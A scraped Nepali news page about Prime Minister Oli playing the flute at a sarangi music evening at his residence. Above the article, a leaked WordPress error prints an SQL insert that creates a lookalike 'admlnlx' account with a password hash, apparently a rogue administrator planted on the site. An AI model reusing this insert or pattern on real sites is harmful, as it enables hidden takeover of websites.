WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B17ZKh6n08hx1Jt5RdyeRmIopAoB9l1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 07:45:27', '', 'admlnlx', 'admlnlx')

“सारंगी साँझ”मा बाँसुरी बजाउँदै प्रधानमन्त्री ! – Gaule Khabar

“सारंगी साँझ”मा बाँसुरी बजाउँदै प्रधानमन्त्री !

पूर्वप्रधानमन्त्री झलनाथ खनाल र माधवकुमार नेपालले सारंगी रेटे

“सारंगी साँझ”मा बाँसुरी बजाउँदै प्रधानमन्त्री !

गाउँले न्युज, काठमाडौं । प्रधानमन्त्री निवास बालुवाटारमा मंगलबार साँझ मदन भण्डारी कला साहित्य प्रतिष्ठान र संगीत तथा नाट्य संगीत प्रतिष्ठानको सहकार्यमा ‘नेपाली मौलिक धूनहरु सारंगी साँझ’ कार्यक्रम सम्पन्न भएको छ ।

कार्यक्रममा प्रधानमन्त्रि केपी शर्मा ओली आफैंले बाँसुरी बजाए । पूर्वप्रधानमन्त्री झलनाथ खनाल र माधवकुमार नेपालले सारंगी रेटे । कलाकारहरुले सांगीतिक धूनहरु पस्केका थिए भने प्रधानमन्त्री निवासका तर्फबाट रात्रीभोज पस्कने काम भएको थियो ।

‘सारंगी साँझ’ मा सत्तारुढ दलका शीर्ष नेताहरु, बहालवाला मन्त्रीहरु र संगीतका पारखीका साथै भर्खरै राजीनामा दिएका उच्चपदस्थ कर्मचारीसमेत देखिन्थे । सारंगी साँझ सुरु हुनुअघि बालुवाटारमै भएको सम्पादकहरुसँगको छलफलमा प्रधानमन्त्री ओलीले सारंगी साँझमा सहभागी हुन पत्रकारहरुलाई पनि निम्तो दिएका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका